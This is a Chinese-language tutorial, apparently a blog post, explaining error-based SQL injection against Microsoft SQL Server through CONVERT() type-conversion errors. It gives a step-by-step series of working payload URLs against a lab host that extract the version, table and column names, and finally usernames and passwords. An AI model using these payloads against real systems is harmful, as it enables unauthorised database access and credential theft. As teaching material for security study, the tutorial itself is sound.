简介
今天主要分享下sql
注入中的报错型
,在大多网上的文章会列出类似于公式的句子,却没解释为什么要使用这样的函数,为什么使用这个函数会出现报错而导致sql注入。
convert()
函数,CONVERT()
函数是把⽇期转换为新数据类型的通⽤函数。
语法:
CONVERT(data_type(length),data_to_be_converted,style)
注释 :
data_type(length) 转换为⽬标数据类型(带有可选的长度)。
data_to_be_converted 含有需要转换的值。
style 规定⽇期/时间的输出格式。
⽰例:
CONVERT(VARCHAR(19),GETDATE())
CONVERT(VARCHAR(10),GETDATE(),110)
CONVERT(VARCHAR(11),GETDATE(),106)
CONVERT(VARCHAR(24),GETDATE(),113)
结果类似:
Dec 29 2008 11:45 PM
12-29-2008
29 Dec 08
29 Dec 2008 16:25:46.635
原理
对于 convert(int,@@version)
,convert
函数⾸先会执⾏第⼆个参数指定的SQL查询,然后尝试将查询结果转换为int
类型。但是,由于这个SQL查询的结果是varchar
类型,⽆法进⾏指定的转换,所以,convert
函数会抛出 ⼀个SQL server
错误消息,指出“SQL查询结果”⽆法转换为“int”
类型,这样的话,攻击者就能得到的这个SQL查询的结果了。
满⾜条件的函数还有很多:
convert()
file_name()
db_name()
col_name()
filegroup_name()
object_name()
schema_name()
type_name()
cast()
注⼊流程
查询基本信息
convert(int,@@version) 获取版本信息
convert(int,db_name()) 数据库名字
convert(int,user) 当前⽤户名
convert(int,@@SERVERNAME) 获取有关服务器主机的信息
获取版本信息
http://192.168.159.135:8080/get.aspx?id=convert(int,@@version)
注意在这里我们直接吧函数放到 id=
的后面,因为 id=1
查询的是整型(int
),而我们的 convert(int,@@version)
获取到的版本信息是字符型
,所以他就会报错,从而爆出版本信息!
或者也可以使用这条语句也能实现上面的查询结果:
http://192.168.159.135:8080/get.aspx?id=1 and 1=(convert(int,@@version))
获取当前数据库的表名
CONVERT(int,(select top 1 table_name from information_schema.columns))
http://192.168.159.135:8080/get.aspx?id=CONVERT(int,(select top 1 table_name from information_schema.columns)
我们获取到了当前网站数据库的表名是:users
!
获取列名
convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(16进制的表名 as varchar)))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar)))
这样我们就获取到了第一个列名 id
!
那么想要获取第二个列名我们就可以再后面加一个条件语句:and COLUMN_NAME != 'id'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id'))
这样我们就获取到了第二个列名:username
!
想要获取第三个也是以此类推加条件语句:and COLUMN_NAME != 'username'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 COLUMN_NAME from information_schema.columns where TABLE_NAME=cast(0x7573657273 as varchar) and COLUMN_NAME != 'id' and COLUMN_NAME != 'username'))
这样我们就获取到了第三个列名 password
!
获取数据
我们按照上面的顺序获取到了网站的表名:users
,列名有:id
、username
、password
。很明显账号密码就在列名的username
、password
,那么我们就可以获取数据了:
convert(int,(select top 1 列名 from 表名))
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users))
获取到了第一个username
列名的第一个数据:saul
!
如果想获取到 username
里面的第二个数据那么就加一个条件语句:where username!='saul'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 username from users where username!='saul'))
这样就获取到的 username
的第二个数据!想要获取第二个就以此类推!
既然 username
我们获取到了两个:saul
、admin
!那么我们就要获取到他们的密码了!
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users))
获取到第一个 password
列的值为:saul520
!
想要获取下一个就加一个 where
条件语句:where password!='saul520'
http://192.168.159.135:8080/get.aspx?id=convert(int,(select top 1 password from users where password!='saul520'))
这样就获取到了第二个password
的数据了!
至此Mssql
的报错注入
就到此为止!
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论